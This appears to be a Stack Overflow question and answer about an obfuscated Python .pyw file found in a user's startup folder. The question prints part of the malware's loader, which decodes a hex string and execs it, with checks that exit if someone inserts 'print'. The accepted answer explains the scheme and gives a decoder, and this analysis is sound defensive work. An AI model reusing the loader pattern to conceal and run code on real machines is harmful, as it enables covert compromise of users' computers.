# Trying to understand this potentially virus encrypted pyw file

Tags: python, python-3.x, pywin32, virus

Today I realised this .pyw file was added into my startup files.

Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.

Can someone either guide me through how I can do that, or check it for me?

edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:

```
    class Protect():
 def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
 def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
  self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
  return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
```

Comment: There should be a way to print it on the screen instead of executing so it would technically decode itself, no? Technically it is its own decoder as well. But I am not experienced in Python so I don't know how I would make it 'echo/print' instead of executing.

Comment: Can you explain why you rolled back the edit which repaired some obvious breakage in the code you posted?

Comment: @tripleee If this is the obfuscated form OP found the file in, I think it's appropriate to leave it in that form. An answer deobfuscating the code is probably more appropriate than an edit.

Answer (score 3, accepted):

**OBLIGATORY WARNING**: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say **DO NOT RUN THIS SCRIPT**.

The payload for this nasty thing is in that `_sparkle` string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and `exec`'s it, using the `_sparkle` data to do it. It also has some basic protection against you inserting `print` statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.

```
# hi
# if you deobf
```

Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.

```
import binascii

# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            print()
        else:
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
```

Each sequence of hex digits between the `/` is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted *back* into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the `decode` string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.

From here, you have a few options.

1. Run the Python script I gave above on the real, full `_sparkle` string and figure out what the resulting program does yourself.
2. Run the Python script I gave above on the real, full `_sparkle` string and post the code in your question so we can decompose that.
3. Post the full `_sparkle` string in the question, so I or someone else can decode it.
4. Wipe the PC to factory settings and move on.